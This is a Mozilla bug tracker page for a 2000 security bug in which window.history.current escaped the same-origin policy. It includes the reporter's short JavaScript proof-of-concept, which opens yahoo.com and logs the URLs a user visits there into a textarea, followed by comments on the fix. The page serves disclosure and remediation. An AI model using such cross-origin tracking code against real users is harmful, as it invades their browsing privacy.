Closed
Bug 37905
Opened 24 years ago
Closed 24 years ago
window.history.current allows tracking user's browsing
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M16
People
(Reporter: norrisboyd, Assigned: security-bugs)
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 file)
|
749 bytes,
text/html
|
Details |
Subject:
BUG: window.history.current allows tracking user's browsing
Date:
Tue, 02 May 2000 15:45:02 +0300
From:
Georgi Guninski <joro@nat.bg>
To:
Norris Boyd <norris@netscape.com>
window.history.current is not protected by Same Origin security policy
and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
a=window.open("http://www.yahoo.com");
function checkStatus()
{
current=a.history.current;
if (current != "" && current != last)
{
last = current;
document.forms[0].elements[0].value += current + " ";
}
}
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------
Reading links using window.history.current
window.history.current is not protected by Same Origin security policy and that
allows tracking user's surfing.
Follow some links in www.yahoo.com and see them in the TEXTAREA bellow.
|
Reporter | |
Comment 1•24 years ago
|
||
|
Assignee | |
Comment 2•24 years ago
|
||
Need to double-check call to same-origin, check default policy. I think I can take care of this one.
|
|
Assignee | |
Updated•24 years ago
|
Target Milestone: --- → M16
|
|
Assignee | |
Comment 6•24 years ago
|
||
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
|
|
Assignee | |
Comment 8•24 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•